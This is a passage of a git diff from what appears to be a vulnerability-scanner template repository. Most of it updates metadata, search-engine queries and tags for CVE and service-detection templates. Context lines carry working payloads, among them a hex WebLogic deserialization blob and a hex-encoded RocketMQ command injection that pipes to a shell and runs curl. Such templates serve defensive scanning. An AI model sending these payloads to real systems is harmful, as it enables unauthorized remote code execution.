"016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078" diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index cb805c9198..c1544c488b 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: cisco product: ios - tags: cve2017,network,cve,cisco,rce,kev,msf + shodan-query: + - product:"cisco ios http config" + - cpe:"cpe:2.3:o:cisco:ios" + tags: cve2017,network,cve,cisco,rce,kev,msf,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index fa34d154c7..1d74565167 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: log4j - tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast + tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast,tcp variables: end: "\r\n" tcp: diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 3f817a5326..749a1f58ef 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -27,7 +27,12 @@ info: max-request: 1 vendor: oracle product: weblogic_server - tags: network,cve2018,cve,oracle,weblogic,deserialization,kev + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" + tags: network,cve2018,cve,oracle,weblogic,deserialization,kev,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 65356e9fef..c18857b3b2 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -26,7 +26,12 @@ info: max-request: 2 vendor: oracle product: weblogic_server - tags: cve,cve2018,weblogic,network,deserialization,rce,oracle + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" + tags: cve,cve2018,weblogic,network,deserialization,rce,oracle,tcp tcp: - inputs: - data: "t3 12.2.1 diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index a71f9ce3bb..61dc37fb68 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -20,16 +20,26 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.9386 - epss-percentile: 0.99081 + epss-score: 0.93315 + epss-percentile: 0.99068 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: apache product: airflow - shodan-query: product:"redis" - tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp variables: data: "*3\r diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index cf19b20244..936779fb43 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -26,8 +26,12 @@ info: max-request: 4 vendor: apache product: geode - shodan-query: title:"Apache Tomcat" - tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + fofa-query: title="apache tomcat" + google-query: intitle:"apache tomcat" + tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index dfedb77d30..18c38425a6 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -20,14 +20,15 @@ info: cvss-score: 9.1 cve-id: CVE-2021-44521 cwe-id: CWE-732,CWE-94 - epss-score: 0.04594 - epss-percentile: 0.92315 + epss-score: 0.05417 + epss-percentile: 0.93135 cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: cassandra - tags: cve,cve2021,network,rce,apache,cassandra + shodan-query: cpe:"cpe:2.3:a:apache:cassandra" + tags: cve,cve2021,network,rce,apache,cassandra,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index 1b2082a1d0..514fe8af8e 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -25,12 +25,13 @@ info: epss-score: 0.97184 cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* metadata: - vendor: redis max-request: 2 + vendor: redis product: redis - shodan-query: redis_version - tags: cve,cve2022,network,redis,unauth,rce,kev - + shodan-query: + - redis_version + - redis + tags: cve,cve2022,network,redis,unauth,rce,kev,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 0dc99a7dc2..b032f1d7c3 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -29,8 +29,11 @@ info: max-request: 2 vendor: apache product: couchdb - shodan-query: product:"CouchDB" - tags: cve2022,network,cve,couch,rce,kev,couchdb,apache + shodan-query: + - product:"CouchDB" + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" + tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index 0d5e0514ca..42baa69b63 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: inglorion product: muhttpd - tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion + tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 9dcedde472..a021f4f488 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -20,16 +20,25 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33246 cwe-id: CWE-94 - cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* epss-score: 0.95581 + cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* metadata: - fofa-query: protocol="rocketmq" - max-request: 1 - product: rocketmq - shodan-query: title:"RocketMQ" - vendor: apache verified: true - tags: network,cve2023,cve,rocketmq,rce,oast,intrusive,apache + max-request: 1 + vendor: apache + product: rocketmq + shodan-query: + - title:"RocketMQ" + - http.title:"rocketmq-console-ng" + - http.title:"rocketmq" + fofa-query: + - protocol="rocketmq" + - title="rocketmq-console-ng" + - title="rocketmq" + google-query: + - intitle:"rocketmq" + - intitle:"rocketmq-console-ng" + tags: packetstorm,network,cve2023,cve,rocketmq,rce,oast,intrusive,apache,tcp variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' part_b: '{{ hex_decode("3b0a") }}' diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml index 25a8deb085..ea3ab6d42b 100644 --- a/network/default-login/ftp-anonymous-login.yaml +++ b/network/default-login/ftp-anonymous-login.yaml @@ -10,7 +10,7 @@ info: - https://tools.ietf.org/html/rfc2577 metadata: max-request: 1 - tags: network,ftp,default-login + tags: network,ftp,default-login,tcp tcp: - inputs: diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml index f28f01cf1f..da3048edb0 100644 --- a/network/default-login/ftp-weak-credentials.yaml +++ b/network/default-login/ftp-weak-credentials.yaml @@ -12,7 +12,7 @@ info: cvss-score: 8.5 metadata: max-request: 1 - tags: network,ftp,default-login,service + tags: network,ftp,default-login,service,tcp tcp: diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml index 3141f0b300..10f4483c69 100644 --- a/network/default-login/ldap-anonymous-login.yaml +++ b/network/default-login/ldap-anonymous-login.yaml @@ -5,18 +5,17 @@ info: author: s0obi severity: medium description: The remote LDAP server allows anonymous access + remediation: Configure the service to disallow NULL BINDs. reference: - https://ldap.com/ldapv3-wire-protocol-reference-bind - https://www.mowasay.com/2016/01/windows-how-do-i-disable-or-enable-anonymous-ldap-binds-to-windows-server-2008-r2-active-directory-ad/ - remediation: Configure the service to disallow NULL BINDs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-284 metadata: max-request: 1 - tags: network,ldap,default-login,tenable - + tags: network,ldap,default-login,tenable,tcp tcp: - inputs: - data: 300c020101600702010304008000 diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml index ff4cf39ecc..c1ebb0eb00 100644 --- a/network/detection/activemq-openwire-transport-detect.yaml +++ b/network/detection/activemq-openwire-transport-detect.yaml @@ -7,11 +7,10 @@ info: description: | OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority. metadata: + verified: true max-request: 1 shodan-query: product:"ActiveMQ OpenWire transport" - verified: true - tags: network,activemq,detect,openwire - + tags: network,activemq,detect,openwire,detection,tcp tcp: - inputs: - data: "VERSION" diff --git a/network/detection/aix-websm-detect.yaml b/network/detection/aix-websm-detect.yaml index f2e5746791..8b015d2de1 100644 --- a/network/detection/aix-websm-detect.yaml +++ b/network/detection/aix-websm-detect.yaml @@ -10,11 +10,10 @@ info: - https://en.wikipedia.org/wiki/IBM_Web-based_System_Manager - https://www.filibeto.org/unix/aix/lib/rel/5.2/wsmadmn.pdf metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "/websm/" - tags: network,aix,detect - + tags: network,aix,detect,detection,tcp tcp: - inputs: - data: "en_US\r\n" diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml index a6428320a2..42d4e58fcd 100644 --- a/network/detection/apache-activemq-detect.yaml +++ b/network/detection/apache-activemq-detect.yaml @@ -7,11 +7,10 @@ info: description: | Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. metadata: + verified: true max-request: 1 shodan-query: product:"Apache ActiveMQ" - verified: true - tags: network,activemq,oss,detect,apache - + tags: network,activemq,oss,detect,apache,detection,tcp tcp: - inputs: - data: "HELP\n\n\u0000" diff --git a/network/detection/aws-sftp-detect.yaml b/network/detection/aws-sftp-detect.yaml index 2294a4a534..b4c87c6dc1 100644 --- a/network/detection/aws-sftp-detect.yaml +++ b/network/detection/aws-sftp-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: SSH-2.0-AWS_SFTP_1.1 - tags: network,ssh,detect,aws,sftp - + tags: network,ssh,detect,aws,sftp,detection,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml index 86d00cf935..cfbd5a0184 100644 --- a/network/detection/axigen-mail-server-detect.yaml +++ b/network/detection/axigen-mail-server-detect.yaml @@ -7,12 +7,11 @@ info: description: | Axigen Mail Server was detected. metadata: - fofa-query: app="axigen-Mail-Server" + verified: true max-request: 1 shodan-query: product:"Axigen" - verified: true - tags: network,axigen,detect,smtp - + fofa-query: app="axigen-Mail-Server" + tags: network,axigen,detect,smtp,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/bgp-detect.yaml b/network/detection/bgp-detect.yaml index 0fd5b34941..d79e02c355 100644 --- a/network/detection/bgp-detect.yaml +++ b/network/detection/bgp-detect.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 1 shodan-query: product:"BGP" - tags: network,bgp,detect + tags: network,bgp,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/bitvise-ssh-detect.yaml b/network/detection/bitvise-ssh-detect.yaml index 5b50595cd9..8d81ebb239 100644 --- a/network/detection/bitvise-ssh-detect.yaml +++ b/network/detection/bitvise-ssh-detect.yaml @@ -14,10 +14,9 @@ info: cwe-id: CWE-200 cpe: cpe:/a:bitvise:winsshd metadata: - shodan-query: product:"bitvise" max-request: 1 - tags: network,ssh,bitvise,detect - + shodan-query: product:"bitvise" + tags: network,ssh,bitvise,detect,detection,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/detection/bluecoat-telnet-proxy-detect.yaml b/network/detection/bluecoat-telnet-proxy-detect.yaml index f8947f2e7c..67cb874d24 100644 --- a/network/detection/bluecoat-telnet-proxy-detect.yaml +++ b/network/detection/bluecoat-telnet-proxy-detect.yaml @@ -11,10 +11,9 @@ info: - https://techdocs.broadcom.com/us/en/symantec-security-software/web-and-network-security/edge-swg/7-3/about-ssl-proxy.html - https://techdocs.broadcom.com/us/en/symantec-security-software/web-and-network-security/edge-swg/7-3.html metadata: - max-request: 1 verified: true - tags: network,bluecoat,proxy,detect - + max-request: 1 + tags: network,bluecoat,proxy,detect,detection,tcp tcp: - inputs: - data: "\r\n" diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml index 3e4937c6c7..1ffc81509c 100644 --- a/network/detection/cisco-finger-detect.yaml +++ b/network/detection/cisco-finger-detect.yaml @@ -7,11 +7,10 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: + verified: true max-request: 1 shodan-query: product:"Cisco fingerd" - verified: true - tags: network,finger,detect,cisco - + tags: network,finger,detect,cisco,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml index cdabb2ddad..5497437246 100644 --- a/network/detection/clamav-detect.yaml +++ b/network/detection/clamav-detect.yaml @@ -7,11 +7,10 @@ info: description: | Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses. metadata: + verified: true max-request: 1 shodan-query: port:3310 product:"ClamAV" - verified: true - tags: network,clamav,detect - + tags: network,clamav,detect,detection,tcp tcp: - inputs: - data: "VERSION" diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml index 502754b6b2..11338b526d 100644 --- a/network/detection/cql-native-transport.yaml +++ b/network/detection/cql-native-transport.yaml @@ -7,11 +7,10 @@ info: description: | Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server. metadata: + verified: true max-request: 1 shodan-query: cassandra - verified: true - tags: network,cassandra,cql,detect - + tags: network,cassandra,cql,detect,detection,tcp tcp: - inputs: - data: "/n" diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml index 96c383b8aa..21fd8b0065 100644 --- a/network/detection/detect-addpac-voip-gateway.yaml +++ b/network/detection/detect-addpac-voip-gateway.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,addpac,apos,voip,detect + tags: network,addpac,apos,voip,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml index d8ecc79c8d..7195ed8989 100644 --- a/network/detection/detect-jabber-xmpp.yaml +++ b/network/detection/detect-jabber-xmpp.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,jabber,xmpp,messaging,detect + tags: network,jabber,xmpp,messaging,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index d28906d6ff..51a660c5b5 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"MS .NET Remoting httpd" - verified: true - tags: network,detect,microsoft,dotnet - + tags: network,detect,microsoft,dotnet,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 0f5937ac2c..29c0761486 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 4 - shodan-query: ESMTP verified: true - tags: network,detect,smtp,mail - + max-request: 1 + shodan-query: ESMTP + tags: network,detect,smtp,mail,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/exim-detect.yaml b/network/detection/exim-detect.yaml index 1bc94ab45f..36e5087adb 100644 --- a/network/detection/exim-detect.yaml +++ b/network/detection/exim-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 2 - shodan-query: product:"Exim smtpd" verified: true - tags: network,detect,smtp,mail,exim - + max-request: 1 + shodan-query: "product:\"Exim smtpd\"" + tags: network,detect,smtp,mail,exim,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index bcd85bb449..91d7e9bbd9 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -7,8 +7,8 @@ info: description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. metadata: - max-request: 4 - tags: mail,expn,network,detect,smtp + max-request: 1 + tags: mail,expn,network,detect,smtp,detection,tcp tcp: - inputs: diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml index b1db8234d0..736f0e305c 100644 --- a/network/detection/finger-detect.yaml +++ b/network/detection/finger-detect.yaml @@ -7,11 +7,10 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: + verified: true max-request: 1 shodan-query: port:"79" action - verified: true - tags: network,finger,detect - + tags: network,finger,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml index b0f64e9844..c85311da1f 100644 --- a/network/detection/gnu-inetutils-ftpd-detect.yaml +++ b/network/detection/gnu-inetutils-ftpd-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"GNU Inetutils FTPd" - verified: true - tags: network,ftp,smartgateway,gnu,inetutils,detect - + tags: network,ftp,smartgateway,gnu,inetutils,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml index 8b07c94d51..6efb094bbc 100644 --- a/network/detection/gopher-detect.yaml +++ b/network/detection/gopher-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,gopher,detect + tags: network,gopher,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml index f2a84eb117..deafa41531 100644 --- a/network/detection/ibm-d2b-database-server.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"IBM DB2 Database Server" - verified: true - tags: network,ibm,database,db,db2,detect - + tags: network,ibm,database,db,db2,detect,detection,tcp tcp: - inputs: - data: "01c2000000040000b601000053514c4442325241000100000401010005001d008800000001000080000000010900000001000040000000010900000001000040000000010800000004000040000000010400000001000040000000400400000004000040000000010400000004000040000000010400000004000040000000010400000002000040000000010400000004000040000000010000000001000040000000000400000004000080000000010400000004000080000000010400000003000080000000010400000004000080000000010800000001000040000000010400000004000040000000011000000001000080000000011000000001000080000000010400000004000040000000010900000001000040000000010900000001000080000000010400000003000080000000010000000000000000000000000104000001000080000000010000000000000000000000000000000000000000000000000000000001000040000000010000000001000040000000002020202020202020000000000000000000000000000000000100ff000000000000000000000000000000000000000000e404000000000000000000000000000000000000007f" diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml index 22d2ec0ada..9a417a0a22 100644 --- a/network/detection/imap-detect.yaml +++ b/network/detection/imap-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: imap - verified: true - tags: network,detect,imap,mail - + tags: network,detect,imap,mail,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml index 586851d2bf..8570172f60 100644 --- a/network/detection/iplanet-imap-detect.yaml +++ b/network/detection/iplanet-imap-detect.yaml @@ -10,10 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" max-request: 1 - tags: network,imap,detect,iplanet - + fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" + tags: network,imap,detect,iplanet,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/java-rmi-detect.yaml b/network/detection/java-rmi-detect.yaml index 527a054c22..7827d8bbba 100644 --- a/network/detection/java-rmi-detect.yaml +++ b/network/detection/java-rmi-detect.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,rmi,java,detect + tags: network,rmi,java,detect,detection,tcp tcp: - inputs: - data: "{{hex_decode('4a524d4900024b')}}" diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml index da5b71a91c..03129922d8 100644 --- a/network/detection/microsoft-ftp-service.yaml +++ b/network/detection/microsoft-ftp-service.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: Microsoft FTP Service - verified: true - tags: network,ftp,microsoft,detect - + tags: network,ftp,microsoft,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml index 7e462acecb..5cbdac8c05 100644 --- a/network/detection/mikrotik-ftp-server-detect.yaml +++ b/network/detection/mikrotik-ftp-server-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"MikroTik router ftpd" - verified: true - tags: network,ftp,mikrotik,router,detect - + tags: network,ftp,mikrotik,router,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml index 69b48d9be5..119e52677d 100644 --- a/network/detection/mikrotik-routeros-api.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"MikroTik RouterOS API Service" - verified: true - tags: network,mikrotik,detect - + tags: network,mikrotik,detect,detection,tcp tcp: - inputs: - data: "3a0000002f00000002000040020f0001003d050000000000000000000000002f000000000000000000401f0000000000000000000000000000000000" diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml index 1cd1b6d2dc..20ee91e9ab 100644 --- a/network/detection/mongodb-detect.yaml +++ b/network/detection/mongodb-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,mongodb,detect + tags: network,mongodb,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/moveit-sftp-detect.yaml b/network/detection/moveit-sftp-detect.yaml index 7bbb02ecf8..9ef5476b8d 100644 --- a/network/detection/moveit-sftp-detect.yaml +++ b/network/detection/moveit-sftp-detect.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: "SSH-2.0-MOVEit" - tags: network,ssh,detect,moveit,sftp + tags: network,ssh,detect,moveit,sftp,detection,tcp tcp: - host: diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml index 00e3a4619e..84950825ad 100644 --- a/network/detection/msmq-detect.yaml +++ b/network/detection/msmq-detect.yaml @@ -11,12 +11,11 @@ info: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554 metadata: - censys-query: services.service_name:MSMQ + verified: true max-request: 1 shodan-query: MSMQ - verified: true - tags: network,msmq,detect - + censys-query: services.service_name:MSMQ + tags: network,msmq,detect,detection,tcp tcp: - inputs: - data: 10c00b004c494f523c020000ffffffff00000200d1587355509195954997b6e611ea26c60789cd434c39118f44459078909ea0fc4ecade1d100300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 1fd8346ac1..d3e59ca297 100644 --- 